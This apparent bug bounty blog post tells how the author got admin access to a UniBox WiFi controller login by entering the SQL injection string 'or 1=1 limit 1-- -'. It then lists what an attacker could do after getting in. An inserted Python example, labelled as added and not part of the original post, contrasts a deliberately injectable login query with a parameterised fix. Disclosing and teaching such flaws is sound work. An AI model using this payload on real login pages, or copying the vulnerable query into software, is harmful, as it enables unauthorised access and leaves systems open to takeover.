Login Bypass and Full Account Takeover: SQL Exploits — Bug bounty
Alright guys,
In my last Account Takeover post, I explained how I leveraged endpoint disclosure through JavaScript files to gain admin access. If you haven’t read it, go ahead and take a look!
Also, I would love to connect with you on LinkedIn, I believe that is the most professional way to stay connected and in touch. If we are not connected, send me a request! www.linkedin.com/in/facufernandez
Within the scope of work of this company, which I will call Target, I found an IP address that led me to this login page:
UniBox is an all-in-one appliance designed for managing public Wi-Fi hotspots. It functions as a network access controller/gateway by enforcing splash page, authentication, and session control.
I will share how I was able to bypass the login in a minute. For now, it is important to understand why UniBox — WifiSoft needs to be protected.
Here are five potential attack vectors an attacker might exploit after gaining access to UniBox:
- Man-in-the-Middle (MitM) Attacks: With access to the WiFi management system, an attacker can potentially intercept, alter, or eavesdrop on the traffic passing between connected users and their intended destinations. This can lead to data theft, session hijacking, or malicious content injection.
- Spread Malware: The attacker can set up malicious landing pages or captive portals to deliver malware to connected devices. They might also be able to redirect users to phishing sites or other harmful web locations.
- Denial of Service (DoS) or Distributed Denial of Service (DDoS): An attacker can potentially disrupt the WiFi service, causing outages or degrading the network’s performance, leading to business disruption and loss of trust among users.
- Credential Harvesting: With the control of the system, an attacker might be able to capture login credentials of users who connect to the WiFi network. This can then be used for further attacks or sold on the dark web.
- Network Mapping and Lateral Movement: Once inside, the attacker can map the internal network, identify connected devices and systems, and attempt to exploit vulnerabilities in them. This could lead to deeper network penetration and potentially compromising more sensitive systems or data repositories.
HAPPYHACKING:
After doing research on UniBox and its versions and vulnerabilities, I tried the following SQL injection:
'or 1=1 limit 1-- -
And just like that I was logged in as an admin.
The password input does not matter; you can type in whatever you want.
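To show why that one string is enough, here is an added example (my own code, not part of the original post and nothing from WifiSoft or UniBox): a minimal login check against an in-memory SQLite table with constructed users and passwords. The function names, the schema, and the demo credentials are all assumptions. `vulnerable_login` splices the input into the query text the way a legacy login handler does; `hardened_login` binds the username as a parameter and keeps the password out of SQL entirely, comparing a PBKDF2 hash in constant time instead.

```python
# Added example (not from the original post): why "'or 1=1 limit 1-- -" works
# against string-built SQL, and how a parameterised query plus a hash
# comparison defeats it. Table, users and passwords below are constructed.
import hashlib
import hmac
import os
import sqlite3

PAYLOAD = "'or 1=1 limit 1-- -"   # the bypass string from the write-up


def hash_password(password: str, salt: bytes) -> bytes:
    # PBKDF2 stands in for a slow KDF; a real deployment would tune the
    # iteration count and prefer argon2/bcrypt where available.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def build_demo_db() -> sqlite3.Connection:
    """Constructed in-memory users table: one admin, one ordinary user."""
    conn = sqlite3.connect(":memory:")
    # The clear-text "password" column exists only to mirror the legacy
    # anti-pattern the vulnerable query relies on; the hardened path uses
    # salt + pw_hash.
    conn.execute(
        "CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT, "
        "salt BLOB, pw_hash BLOB, role TEXT)"
    )
    for name, pw, role in [("admin", "S3cret!demo", "administrator"),
                           ("guest", "guest-demo", "user")]:
        salt = os.urandom(16)
        conn.execute(
            "INSERT INTO users VALUES (?, ?, ?, ?, ?)",
            (name, pw, salt, hash_password(pw, salt), role),
        )
    conn.commit()
    return conn


DEMO_DB = build_demo_db()


def vulnerable_login(username: str, password: str, conn=DEMO_DB):
    """The anti-pattern: user input spliced straight into the SQL text."""
    query = (f"SELECT username, role FROM users "
             f"WHERE username = '{username}' AND password = '{password}'")
    # With username = PAYLOAD the statement becomes
    #   ... WHERE username = ''or 1=1 limit 1-- -' AND password = '...'
    # "--" comments out the password check, "or 1=1" matches every row and
    # "limit 1" hands back the first one, which is usually the admin.
    return conn.execute(query).fetchone()   # (username, role) or None


def hardened_login(username: str, password: str, conn=DEMO_DB):
    """Parameterised lookup by username only, then a constant-time hash check.

    The password never reaches the SQL engine and the username is bound as a
    value, so PAYLOAD is just a username that does not exist."""
    row = conn.execute(
        "SELECT username, role, salt, pw_hash FROM users WHERE username = ?",
        (username,),
    ).fetchone()
    if row is None:
        return None
    name, role, salt, stored = row
    if not hmac.compare_digest(hash_password(password, salt), stored):
        return None
    return (name, role)


if __name__ == "__main__":
    print("vulnerable:", vulnerable_login(PAYLOAD, "whatever"))
    print("hardened:  ", hardened_login(PAYLOAD, "whatever"))
```

The fix is the parameter binding, not input filtering: stripping quotes or blocking `--` leaves every other encoding and comment form open, whereas a bound parameter can never change the shape of the statement. Moving the password comparison out of the WHERE clause also removes the second common mistake, storing or comparing credentials in clear text inside the database query.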
Bypassing authentication in a system like UniBox presents a significant security threat, as it grants unauthorized access to a critical network infrastructure component. Such a vulnerability could expose users to a range of malicious activities, including data interception and malware distribution.
In a matter of 10 minutes, I was inside the Web Application.
Thanks for reading. Ask any question you have in the comments; I tend to reply to those fairly quickly.
Let's connect on LinkedIn: www.linkedin.com/in/facufernandez